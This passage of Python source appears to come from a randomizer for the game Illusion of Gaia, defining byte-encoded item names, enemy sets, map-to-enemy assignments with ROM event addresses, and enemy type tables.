1: b"\xd3\xd6\x1d\x80\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\x4f\xac\xac\xac\xac",
2: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x60\xa2\x88\xa3\x8e\x8d\xac\x4a\x84\xa9\x4f\xac",
3: b"\xd3\xd6\x1d\x48\x8d\x82\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\x40\x4f\xac\xac",
4: b"\xd3\xd6\x1d\x48\x8d\x82\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\x41\x4f\xac\xac",
5: "",
6: b"\xd3\xd6\x1d\x80\x8d\xac\x87\x84\xa2\x81\x4f\xac\xac\xac\xac\xac\xac\xac\xac",
7: b"\xd3\x64\x87\x84\xac\x43\x88\x80\x8c\x8e\x8d\x83\xac\x41\x8b\x8e\x82\x8a\x4f",
8: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x67\x88\x8d\x83\xac\x4c\x84\x8b\x8e\x83\xa9\x4f",
9: b"\xd3\xd6\x1d\x4b\x8e\x8b\x80\x0e\xa3\xac\x4c\x84\x8b\x8e\x83\xa9\x4f\xac\xac",
10: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x4b\x80\xa2\x86\x84\xac\x62\x8e\x80\xa3\xa4\x4f",
11: b"\xd3\xd6\x1d\x4c\x88\x8d\x84\xac\x4a\x84\xa9\xac\x40\x4f\xac\xac\xac\xac\xac",
12: b"\xd3\xd6\x1d\x4c\x88\x8d\x84\xac\x4a\x84\xa9\xac\x41\x4f\xac\xac\xac\xac\xac",
13: b"\xd3\x64\x87\x84\xac\x4c\x84\x8c\x8e\xa2\xa9\xac\x4c\x84\x8b\x8e\x83\xa9\x4f",
14: b"\xd3\xd6\x1d\x80\xac\x42\xa2\xa9\xa3\xa4\x80\x8b\xac\x41\x80\x8b\x8b\x4f\xac",
15: b"\xd3\x64\x87\x84\xac\x44\x8b\x84\xa6\x80\xa4\x8e\xa2\xac\x4a\x84\xa9\x4f\xac",
16: b"\xd3\x64\x87\x84\xac\x4c\xa5\xac\x60\x80\x8b\x80\x82\x84\xac\x4a\x84\xa9\x4f",
17: b"\xd3\x64\x87\x84\xac\x60\xa5\xa2\x88\xa4\xa9\xac\x63\xa4\x8e\x8d\x84\x4f\xac",
18: b"\xd3\x40\xac\x63\xa4\x80\xa4\xa5\x84\xac\x8e\x85\xac\x47\x8e\xa0\x84\x4f\xac",
19: b"\xd3\xd6\x1d\x80\xac\x62\x80\x8c\x80\xac\x63\xa4\x80\xa4\xa5\x84\x4f\xac\xac",
20: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x4c\x80\x86\x88\x82\xac\x43\xa5\xa3\xa4\x4f\xac",
21: "",
22: b"\xd3\xd6\x1d\x4b\x80\x8d\x82\x84\x0e\xa3\xac\x4b\x84\xa4\xa4\x84\xa2\x4f\xac",
23: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x4d\x84\x82\x8a\x8b\x80\x82\x84\x4f\xac\xac\xac",
24: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x67\x88\x8b\x8b\x4f\xac\xac\xac\xac\xac\xac\xac",
25: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x64\x84\x80\xa0\x8e\xa4\x4f\xac\xac\xac\xac\xac",
26: b"\xd3\xd6\x1d\x4c\xa5\xa3\x87\xa2\x8e\x8e\x8c\xac\x43\xa2\x8e\xa0\xa3\x4f\xac",
27: "",
28: b"\xd3\x64\x87\x84\xac\x41\x8b\x80\x82\x8a\xac\x46\x8b\x80\xa3\xa3\x84\xa3\x4f",
29: b"\xd3\x64\x87\x84\xac\x46\x8e\xa2\x86\x8e\x8d\xac\x45\x8b\x8e\xa7\x84\xa2\x4f",
30: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
31: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
32: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
33: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
34: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
35: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
36: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x40\xa5\xa2\x80\x4f\xac\xac\xac\xac\xac\xac\xac",
37: b"\xd3\xd6\x1d\x4b\x8e\x8b\x80\x0e\xa3\xac\x4b\x84\xa4\xa4\x84\xa2\x4f\xac\xac",
38: b"\xd3\xd6\x1d\x45\x80\xa4\x87\x84\xa2\x0e\xa3\xac\x49\x8e\xa5\xa2\x8d\x80\x8b",
39: b"\xd3\x64\x87\x84\xac\x42\xa2\xa9\xa3\xa4\x80\x8b\xac\x62\x88\x8d\x86\x4f\xac",
40: b"\xd3\xd6\x1d\x80\x8d\xac\x40\xa0\xa0\x8b\x84\x4f\xac\xac\xac\xac\xac\xac\xac",
41: b"\xd3\xd6\x1d\x22\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xa3\x4f\xac\xac\xac",
42: b"\xd3\xd6\x1d\x23\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xa3\x4f\xac\xac\xac",
50: b"\xd3\xd6\x1d\x80\x8d\xac\x47\x60\xac\xa5\xa0\x86\xa2\x80\x83\x84\x4f\xac\xac",
51: b"\xd3\xd6\x1d\x80\xac\x43\x44\x45\xac\xa5\xa0\x86\xa2\x80\x83\x84\x4f\xac\xac",
52: b"\xd3\xd6\x1d\x80\xac\x63\x64\x62\xac\xa5\xa0\x86\xa2\x80\x83\x84\x4f\xac\xac",
53: b"\xd3\xd6\x3c\x43\x80\xa3\x87\xac\x88\xa3\xac\x88\x8c\xa0\xa2\x8e\xa6\x84\x83",
54: b"\xd3\x45\xa2\x88\x80\xa2\xac\x88\xa3\xac\x88\x8c\xa0\xa2\x8e\xa6\x84\x83\x4f",
55: b"\xd3\xd6\x1d\x80\xac\x47\x84\x80\xa2\xa4\xac\x60\x88\x84\x82\x84\x4f\xac\xac"
}
# Define short item text for in-game format
# Currently only used in Jeweler's inventory
self.item_text_short = {
0: b"\x4d\x8e\xa4\x87\x88\x8d\x86\xac\xac\xac\xac\xac\xac",
1: b"\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xac\xac\xac\xac",
2: b"\x60\xa2\x88\xa3\x8e\x8d\xac\x4a\x84\xa9\xac\xac\xac",
3: b"\x48\x8d\x82\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\x40",
4: b"\x48\x8d\x82\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\x41",
5: "",
6: b"\x47\x84\xa2\x81\xac\xac\xac\xac\xac\xac\xac\xac\xac",
7: b"\x43\x88\x80\x8c\x8e\x8d\x83\xac\x41\x8b\x8e\x82\x8a",
8: b"\x67\x88\x8d\x83\xac\x4c\x84\x8b\x8e\x83\xa9\xac\xac",
9: b"\x4b\x8e\x8b\x80\x0e\xa3\xac\x4c\x84\x8b\x8e\x83\xa9",
10: b"\x4b\x80\xa2\x86\x84\xac\x62\x8e\x80\xa3\xa4\xac\xac",
11: b"\x4c\x88\x8d\x84\xac\x4a\x84\xa9\xac\x40\xac\xac\xac",
12: b"\x4c\x88\x8d\x84\xac\x4a\x84\xa9\xac\x41\xac\xac\xac",
13: b"\x4c\x84\x8c\x8e\xa2\xa9\xac\x4c\x84\x8b\x8e\x83\xa9",
14: b"\x42\xa2\xa9\xa3\xa4\x80\x8b\xac\x41\x80\x8b\x8b\xac",
15: b"\x44\x8b\x84\xa6\x80\xa4\x8e\xa2\xac\x4a\x84\xa9\xac",
16: b"\x4c\xa5\xac\x60\x80\x8b\x80\x82\x84\xac\x4a\x84\xa9",
17: b"\x60\xa5\xa2\x88\xa4\xa9\xac\x63\xa4\x8e\x8d\x84\xac",
18: b"\x47\x8e\xa0\x84\xac\x63\xa4\x80\xa4\xa5\x84\xac\xac",
19: b"\x62\x80\x8c\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\xac",
20: b"\x4c\x80\x86\x88\x82\xac\x43\xa5\xa3\xa4\xac\xac\xac",
21: "",
22: b"\x4b\x80\x8d\x82\x84\xac\x4b\x84\xa4\xa4\x84\xa2\xac",
23: b"\x4d\x84\x82\x8a\x8b\x80\x82\x84\xac\xac\xac\xac\xac",
24: b"\x67\x88\x8b\x8b\xac\xac\xac\xac\xac\xac\xac\xac\xac",
25: b"\x64\x84\x80\xa0\x8e\xa4\xac\xac\xac\xac\xac\xac\xac",
26: b"\x63\x87\xa2\x8e\x8e\x8c\xac\x43\xa2\x8e\xa0\xa3\xac",
27: "",
28: b"\x41\x8b\x80\x82\x8a\xac\x46\x8b\x80\xa3\xa3\x84\xa3",
29: b"\x46\x8e\xa2\x86\x8e\x8d\xac\x45\x8b\x8e\xa7\x84\xa2",
30: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
31: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
32: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
33: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
34: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
35: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
36: b"\x40\xa5\xa2\x80\xac\xac\xac\xac\xac\xac\xac\xac\xac",
37: b"\x4b\x8e\x8b\x80\x0e\xa3\xac\x4b\x84\xa4\xa4\x84\xa2",
38: b"\x49\x8e\xa5\xa2\x8d\x80\x8b\xac\xac\xac\xac\xac\xac",
39: b"\x42\xa2\xa9\xa3\xa4\x80\x8b\xac\x62\x88\x8d\x86\xac",
40: b"\x40\xa0\xa0\x8b\x84\xac\xac\xac\xac\xac\xac\xac\xac",
41: b"\x22\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xa3\xac",
42: b"\x23\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xa3\xac",
50: b"\x47\x60\xac\x65\xa0\x86\xa2\x80\x83\x84\xac\xac\xac",
51: b"\x43\x44\x45\xac\x65\xa0\x86\xa2\x80\x83\x84\xac\xac",
52: b"\x63\x64\x62\xac\x65\xa0\x86\xa2\x80\x83\x84\xac\xac",
53: b"\x43\x80\xa3\x87\xac\x65\xa0\x86\xa2\x80\x83\x84\xac",
54: b"\x45\xa2\x88\x80\xa2\xac\x65\xa0\x86\xa2\x80\x83\x84",
55: b"\x47\x84\x80\xa2\xa4\xac\x60\x88\x84\x82\x84\xac\xac",
61: b"\xd6\x3c\x43\x80\xa3\x87",
62: b"\xd6\x3c\x63\x8b\x88\x83\x84\xa2",
63: b"\xd7\x31\x43\x80\xa3\x87",
64: b"\xd6\x0c\x45\xa2\x88\x80\xa2",
65: b"\xd6\x03\x41\x80\xa2\xa2\x88\x84\xa2",
66: b"\x44\x80\xa2\xa4\x87\xa1\xa5\x80\x8a\x84\xa2"
}
# Database of enemy groups and spritesets
# FORMAT: { ID: [ROM_Loction, HeaderCode, HeaderData, Name]}
self.enemysets = {
0: [b"\x03\x00\x10\x10\xEC\x59\xCD\x01\x04\x00\x60\xA0\x8C\x75\xDE\x10\xD0\x21\x00\x47\xED\x9F", "Underground Tunnel"],
1: [b"\x03\x00\x10\x10\xBC\x33\xC2\x01\x04\x00\x60\xA0\x0C\x77\xDE\x10\x2A\x0F\x00\xE6\x08\xD5", "Inca Ruins (Mud Monster and Larva)"],
2: [b"\x03\x00\x10\x10\x23\x4D\xC2\x01\x04\x00\x60\xA0\xCC\x77\xDE\x10\x36\x23\x00\x24\x45\xCC", "Inca Ruins (Statues)"],
3: [b"\x03\x00\x10\x10\x16\x5C\xCC\x01\x04\x00\x60\xA0\xCC\x7A\xDE\x10\x30\x29\x00\xBE\x2F\xCB", "Diamond Mine"],
4: [b"\x03\x00\x10\x10\x62\x3D\xCF\x01\x04\x00\x60\xA0\x4C\x7C\xDE\x10\x54\x1D\x00\xEF\xEE\x9E", "Sky Garden (top)"],
5: [b"\x03\x00\x10\x10\x62\x3D\xCF\x01\x04\x00\x60\xA0\x0C\x7D\xDE\x10\x54\x1D\x00\xEF\xEE\x9E", "Sky Garden (bottom)"],
6: [b"\x03\x00\x10\x10\x2D\x2E\xCC\x01\x04\x00\x60\xA0\x00\x00\xDF\x10\x16\x1C\x00\x41\x36\xD1", "Mu"],
7: [b"\x03\x00\x10\x10\xD1\x14\xCF\x01\x04\x00\x60\xA0\x40\x02\xDF\x10\x7F\x0F\x00\x2C\x2B\xD5", "Angel Dungeon"],
8: [b"\x03\x00\x10\x10\x6D\x13\xD0\x01\x04\x00\x60\xA0\x40\x05\xDF\x10\xFF\x16\x00\xF7\xF3\x99", "Great Wall"],
9: [b"\x03\x00\x10\x10\x00\x00\xD0\x01\x04\x00\x60\xA0\x40\x08\xDF\x10\x70\x0E\x00\x5C\x4D\xD8", "Mt. Kress"],
10: [b"\x03\x00\x10\x10\xEA\x15\xCE\x01\x04\x00\x70\x90\x53\x55\xDE\x10\xD5\x14\x00\x08\x73\xCC", "Ankor Wat (outside)"],
11: [b"\x03\x00\x10\x10\x81\x6A\xC1\x01\x04\x00\x70\x90\x13\x57\xDE\x10\x57\x10\x00\x5F\x39\xD4", "Ankor Wat (inside)"],
12: [b"\x03\x00\x10\x10\x0d\x18\xcb\x01\x04\x00\x60\x90\x80\x0a\xdf\x10\xfb\x13\x00\x0e\x67\xd1", "Pyramid"],
13: [b"\x03\x00\x10\x10\x16\x5C\xCC\x01\x04\x00\x60\xA0\xC0\x0C\xDF\x10\x30\x29\x00\xBE\x2F\xCB", "Jeweler's Mansion"]
}
# Enemy map database
# FORMAT: { ID: [EnemySet, RewardBoss(0 for no reward), Reward[type, tier], SearchHeader,
# SpritesetOffset,EventAddrLow,EventAddrHigh,RestrictedEnemysets]}
# ROM address for room reward table is mapID + $1aade
self.maps = {
# For now, no one can have enemyset 10 (Ankor Wat outside)
# Underground Tunnel
12: [0, 1, [0,0], b"\x0C\x00\x02\x05\x03", 4, "c867a", "c86ac", []],
13: [0, 1, [0,0], b"\x0D\x00\x02\x03\x03", 4, "c86ac", "c875c", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]],
14: [0, 1, [0,0], b"\x0E\x00\x02\x03\x03", 4, "c875c", "c8847", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]], # Weird 4way issues
15: [0, 1, [0,0], b"\x0F\x00\x02\x03\x03", 4, "c8847", "c8935", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
18: [0, 1, [0,0], b"\x12\x00\x02\x03\x03", 4, "c8986", "c8aa9", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]], # Spike balls
# Inca Ruins
27: [1, 0, [0,0], b"\x1B\x00\x02\x05\x03", 4, "c8c33", "c8c87", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]], # Moon Tribe cave
29: [1, 1, [0,0], b"\x1D\x00\x02\x0F\x03", 4, "c8cc4", "c8d85", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
32: [1, 1, [0,0], b"\x20\x00\x02\x08\x03", 4, "c8e16", "c8e75", []], # Broken statue
33: [2, 1, [0,0], b"\x21\x00\x02\x08\x03", 4, "c8e75", "c8f57", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]], # Floor switch
34: [2, 1, [0,0], b"\x22\x00\x02\x08\x03", 4, "c8f57", "c9029", []], # Floor switch
35: [2, 1, [0,0], b"\x23\x00\x02\x0A\x03", 4, "c9029", "c90d5", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]],
37: [1, 1, [0,0], b"\x25\x00\x02\x08\x03", 4, "c90f3", "c91a0", [1]], # Diamond block
38: [1, 1, [0,0], b"\x26\x00\x02\x08\x03", 4, "c91a0", "c9242", []], # Broken statues
39: [1, 1, [0,0], b"\x27\x00\x02\x0A\x03", 4, "c9242", "c92f2", []],
40: [1, 1, [0,0], b"\x28\x00\x02\x08\x03", 4, "c92f2", "c935f", [1]], # Falling blocks
# Diamond Mine
61: [3, 2, [0,0], b"\x3D\x00\x02\x08\x03", 4, "c9836", "c98b7", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
62: [3, 2, [0,0], b"\x3E\x00\x02\x08\x03", 4, "c98b7", "c991a", []],
63: [3, 2, [0,0], b"\x3F\x00\x02\x05\x03", 4, "c991a", "c9a41", []],
64: [3, 2, [0,0], b"\x40\x00\x02\x08\x03", 4, "c9a41", "c9a95", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]], # Trapped laborer (??)
65: [3, 2, [0,0], b"\x41\x00\x02\x00\x03", 4, "c9a95", "c9b39", [0, 2, 3, 4, 5, 11]], # Stationary Grundit
69: [3, 2, [0,0], b"\x45\x00\x02\x08\x03", 4, "c9ba1", "c9bf4", []],
70: [3, 2, [0,0], b"\x46\x00\x02\x08\x03", 4, "c9bf4", "c9c5c", [3, 13]],
# Sky Garden
77: [4, 2, [0,0], b"\x4D\x00\x02\x12\x03", 4, "c9db3", "c9e92", []],
78: [5, 2, [0,0], b"\x4E\x00\x02\x10\x03", 4, "c9e92", "c9f53", []],
79: [4, 2, [0,0], b"\x4F\x00\x02\x12\x03", 4, "c9f53", "ca01a", [4, 5]],
80: [5, 2, [0,0], b"\x50\x00\x02\x10\x03", 4, "ca01a", "ca0cb", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
81: [4, 2, [0,0], b"\x51\x00\x02\x12\x03", 4, "ca0cb", "ca192", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
82: [5, 2, [0,0], b"\x52\x00\x02\x10\x03", 4, "ca192", "ca247", [4, 5]],
83: [4, 2, [0,0], b"\x53\x00\x02\x12\x03", 4, "ca247", "ca335", [4, 5]],
84: [5, 2, [0,0], b"\x54\x00\x02\x12\x03", 4, "ca335", "ca43b", [4, 5]],
# Mu
# 92: [6,0,0,b"\x5C\x00\x02\x15\x03",4,[]], # Seaside Palace
95: [6, 3, [0,0], b"\x5F\x00\x02\x14\x03", 4, "ca71b", "ca7ed", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
96: [6, 3, [0,0], b"\x60\x00\x02\x14\x03", 4, "ca7ed", "ca934", [6]],
97: [6, 3, [0,0], b"\x61\x00\x02\x14\x03", 4, "ca934", "caa7b", [6]],
98: [6, 3, [0,0], b"\x62\x00\x02\x14\x03", 4, "caa7b", "cab28", []],
100: [6, 3, [0,0], b"\x64\x00\x02\x14\x03", 4, "cab4b", "cabd4", []],
101: [6, 3, [0,0], b"\x65\x00\x02\x14\x03", 4, "cabd4", "cacc3", [6]],
# Angel Dungeon
109: [7, 3, [0,0], b"\x6D\x00\x02\x16\x03", 4, "caf6e", "cb04b", [7, 8, 9, 10]], # Add 10's back in once flies are fixed
110: [7, 3, [0,0], b"\x6E\x00\x02\x18\x03", 4, "cb04b", "cb13e", [7, 8, 9, 10]],
111: [7, 3, [0,0], b"\x6F\x00\x02\x1B\x03", 4, "cb13e", "cb1ae", [7, 8, 9, 10]],
112: [7, 3, [0,0], b"\x70\x00\x02\x16\x03", 4, "cb1ae", "cb258", [7, 8, 9, 10]],
113: [7, 3, [0,0], b"\x71\x00\x02\x18\x03", 4, "cb258", "cb29e", [7, 8, 9, 10]],
114: [7, 3, [0,0], b"\x72\x00\x02\x18\x03", 4, "cb29e", "cb355", [7, 8, 9, 10]],
# Great Wall
130: [8, 4, [0,0], b"\x82\x00\x02\x1D\x03", 4, "cb6c1", "cb845", [8, 9, 10]], # Add 10's back in once flies are fixed
131: [8, 4, [0,0], b"\x83\x00\x02\x1D\x03", 4, "cb845", "cb966", [7, 8, 9, 10]],
133: [8, 4, [0,0], b"\x85\x00\x02\x1D\x03", 4, "cb97d", "cbb18", [8, 9, 10]],
134: [8, 4, [0,0], b"\x86\x00\x02\x1D\x03", 4, "cbb18", "cbb87", [7, 8, 9, 10]],
135: [8, 4, [0,0], b"\x87\x00\x02\x1D\x03", 4, "cbb87", "cbc3b", [8]],
136: [8, 4, [0,0], b"\x88\x00\x02\x1D\x03", 4, "cbc3b", "cbd0a", [7, 8, 9]],
# Mt Temple
160: [9, 4, [0,0], b"\xA0\x00\x02\x20\x03", 4, "cc18c", "cc21c", []],
161: [9, 4, [0,0], b"\xA1\x00\x02\x20\x03", 4, "cc21c", "cc335", [7, 8, 9, 10]],
162: [9, 4, [0,0], b"\xA2\x00\x02\x20\x03", 4, "cc335", "cc3df", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 13]], # Drops
163: [9, 4, [0,0], b"\xA3\x00\x02\x20\x03", 4, "cc3df", "cc4f7", []],
164: [9, 4, [0,0], b"\xA4\x00\x02\x20\x03", 4, "cc4f7", "cc5f8", [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 13]],
165: [9, 4, [0,0], b"\xA5\x00\x02\x20\x03", 4, "cc5f8", "cc703", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 13]], # Drops
166: [9, 4, [0,0], b"\xA6\x00\x02\x20\x03", 4, "cc703", "cc7a1", []],
167: [9, 4, [0,0], b"\xA7\x00\x02\x20\x03", 4, "cc7a1", "cc9a3", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13]],
168: [9, 4, [0,0], b"\xA8\x00\x02\x20\x03", 4, "cc9a3", "cca02", [7, 8, 9, 10]],
# Ankor Wat
176: [10, 6, [0,0], b"\xB0\x00\x02\x2C\x03", 4, "ccb1b", "ccbd8", []],
177: [11, 6, [0,0], b"\xB1\x00\x02\x08\x03", 4, "ccbd8", "ccca5", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]],
178: [11, 6, [0,0], b"\xB2\x00\x02\x08\x03", 4, "ccca5", "ccd26", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 13]],
179: [11, 6, [0,0], b"\xB3\x00\x02\x08\x03", 4, "ccd26", "ccd83", []],
180: [11, 6, [0,0], b"\xB4\x00\x02\x08\x03", 4, "ccd83", "ccdd7", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 13]],
181: [11, 6, [0,0], b"\xB5\x00\x02\x08\x03", 4, "ccdd7", "cce7b", []],
182: [10, 6, [0,0], b"\xB6\x00\x02\x2C\x03", 4, "cce7b", "cd005", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13]],
183: [11, 6, [0,0], b"\xB7\x00\x02\x08\x03", 4, "cd005", "cd092", []], # Earthquaker Golem
184: [11, 6, [0,0], b"\xB8\x00\x02\x08\x03", 4, "cd092", "cd0df", [0, 1, 3, 4, 5, 7, 8, 9, 11, 13]],
185: [11, 6, [0,0], b"\xB9\x00\x02\x08\x03", 4, "cd0df", "cd137", []],
186: [10, 6, [0,0], b"\xBA\x00\x02\x2C\x03", 4, "cd137", "cd197", []],
187: [11, 6, [0,0], b"\xBB\x00\x02\x08\x03", 4, "cd197", "cd1f4", []],
188: [11, 6, [0,0], b"\xBC\x00\x02\x24\x03", 4, "cd1f4", "cd29a", []],
189: [11, 6, [0,0], b"\xBD\x00\x02\x08\x03", 4, "cd29a", "cd339", []],
190: [11, 6, [0,0], b"\xBE\x00\x02\x08\x03", 4, "cd339", "cd392", []],
# Pyramid
204: [12, 5, [0,0], b"\xCC\x00\x02\x08\x03", 4, "cd539", "cd58c", []],
206: [12, 5, [0,0], b"\xCE\x00\x02\x08\x03", 4, "cd5c6", "cd650", []],
207: [12, 5, [0,0], b"\xCF\x00\x02\x08\x03", 4, "cd650", "cd6f3", []],
208: [12, 5, [0,0], b"\xD0\x00\x02\x08\x03", 4, "cd6f3", "cd752", []],
209: [12, 5, [0,0], b"\xD1\x00\x02\x08\x03", 4, "cd752", "cd81b", []],
210: [12, 5, [0,0], b"\xD2\x00\x02\x08\x03", 4, "cd81b", "cd8f1", []],
211: [12, 5, [0,0], b"\xD3\x00\x02\x08\x03", 4, "cd8f1", "cd9a1", []],
212: [12, 5, [0,0], b"\xD4\x00\x02\x08\x03", 4, "cd9a1", "cda80", []],
213: [12, 5, [0,0], b"\xD5\x00\x02\x08\x03", 4, "cda80", "cdb4b", []],
214: [12, 5, [0,0], b"\xD6\x00\x02\x26\x03", 4, "cdb4b", "cdc1e", []],
215: [12, 5, [0,0], b"\xD7\x00\x02\x28\x03", 4, "cdc1e", "cdcfd", [0, 2, 3, 4, 5, 6, 8, 9, 11, 12, 13]],
216: [12, 5, [0,0], b"\xD8\x00\x02\x08\x03", 4, "cdcfd", "cde4f", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13]],
217: [12, 5, [0,0], b"\xD9\x00\x02\x26\x03", 4, "cde4f", "cdf3c", []],
219: [12, 5, [0,0], b"\xDB\x00\x02\x26\x03", 4, "cdf76", "ce010", [0, 4, 5, 8, 9, 11, 12]], #Spike elevators
# Jeweler's Mansion
233: [13, 0, [0,0], b"\xE9\x00\x02\x22\x03", 4, "ce224", "ce3a6", [0, 1, 2, 3, 4, 5, 6, 8, 9, 11, 12, 13]]
}
# Database of enemy types
# FORMAT: { ID: [Enemyset, Event addr, VanillaTemplate,
# Type(1=stationary,2=walking,3=flying),OnWalkableTile,CanBeRandom,Name]}
self.enemies = {
# Underground Tunnel
0: [0, b"\x55\x87\x8a", b"\x05", 2, True, True, "Bat"], # a8755
1: [0, b"\x6c\x82\x8a", b"\x01", 2, True, True, "Ribber"],
2: [0, b"\x00\x80\x8a", b"\x02", 1, False, True, "Canal Worm"],
3: [0, b"\xf7\x85\x8a", b"\x03", 2, True, False, "King Bat"],
4: [0, b"\x76\x84\x8a", b"\x10", 2, True, True, "Skull Chaser"],
5: [0, b"\xff\x86\x8a", b"\x04", 2, True, False, "Bat Minion 1"],
6: [0, b"\x9a\x86\x8a", b"\x04", 2, True, False, "Bat Minion 2"],
7: [0, b"\x69\x86\x8a", b"\x04", 2, True, False, "Bat Minion 3"],
8: [0, b"\xcb\x86\x8a", b"\x04", 2, True, False, "Bat Minion 4"],
# Inca Ruins
10: [1, b"\xb7\x8d\x8a", b"\x0b", 2, True, True, "Slugger"],
11: [1, b"\xb6\x8e\x8a", b"\x0b", 2, True, False, "Scuttlebug"],
12: [1, b"\x1b\x8b\x8a", b"\x0a", 2, True, True, "Mudpit"],
13: [1, b"\x70\x8c\x8a", b"\x0c", 1, True, True, "Four Way"],
14: [2, b"\xee\x97\x8a", b"\x0f", 2, True, True, "Splop"],
15: [2, b"\xbc\x98\x8a", b"\x0e", 3, False, True, "Whirligig"],
16: [2, b"\xc2\x95\x8a", b"\x0d", 2, True, False, "Stone Lord R"], # shoots fire
17: [2, b"\xb3\x95\x8a", b"\x0d", 2, True, True, "Stone Lord D"], # shoots fire
18: [2, b"\xb8\x95\x8a", b"\x0d", 2, True, False, "Stone Lord U"], # shoots fire
19: [2, b"\xbd\x95\x8a", b"\x0d", 2, True, False, "Stone Lord L"], # shoots fire
20: [2, b"\x70\x90\x8a", b"\x0d", 2, True, False, "Stone Guard R"], # throws spears
21: [2, b"\x6b\x90\x8a", b"\x0d", 2, True, False, "Stone Guard L"], # throws spears
22: [2, b"\x61\x90\x8a", b"\x0d", 2, True, True, "Stone Guard D"], # throws spears
23: [2, b"\xc3\x99\x8a", b"\x0e", 1, False, False, "Whirligig (stationary)"],
# Diamond Mine
30: [3, b"\xca\xaa\x8a", b"\x18", 2, True, True, "Flayzer 1"],
31: [3, b"\x54\xaa\x8a", b"\x18", 2, True, False, "Flayzer 2"],
32: [3, b"\x8a\xaa\x8a", b"\x18", 2, True, False, "Flayzer 3"],
33: [3, b"\x03\xb1\x8a", b"\x19", 2, True, True, "Eye Stalker"],
34: [3, b"\xb3\xb0\x8a", b"\x19", 2, True, False, "Eye Stalker (stone)"],
35: [3, b"\xf5\xaf\x8a", b"\x1a", 1, True, True, "Grundit"],
# 36: [3,b"\xf5\xa4\x8a",b"\x1a","Grundit (stationary)"], # Can't randomize this guy
# Sky Garden
40: [4, b"\xb0\xb4\x8a", b"\x1d", 2, True, True, "Blue Cyber"],
41: [4, b"\x20\xc5\x8a", b"\x1b", 2, True, True, "Dynapede 1"],
42: [4, b"\x33\xc5\x8a", b"\x1b", 2, True, False, "Dynapede 2"],
43: [5, b"\xb0\xb8\x8a", b"\x1e", 2, True, True, "Red Cyber"],
44: [5, b"\x16\xc8\x8a", b"\x1c", 2, True, True, "Nitropede"],
# Mu
50: [6, b"\xcc\xe6\x8a", b"\x2b", 2, True, True, "Slipper"],
51: [6, b"\x5c\xe4\x8a", b"\x2a", 2, True, True, "Skuddle"],
52: [6, b"\x9e\xdd\x8a", b"\x28", 2, True, True, "Cyclops"],
53: [6, b"\x6e\xe2\x8a", b"\x29", 3, True, True, "Flasher"],
54: [6, b"\x07\xde\x8a", b"\x28", 2, True, False, "Cyclops (asleep)"],
55: [6, b"\xf4\xe6\x8a", b"\x2b", 2, True, True, "Slipper (falling)"],
# Angel Dungeon
60: [7, b"\x9f\xee\x8a", b"\x2d", 3, False, True, "Dive Bat"],
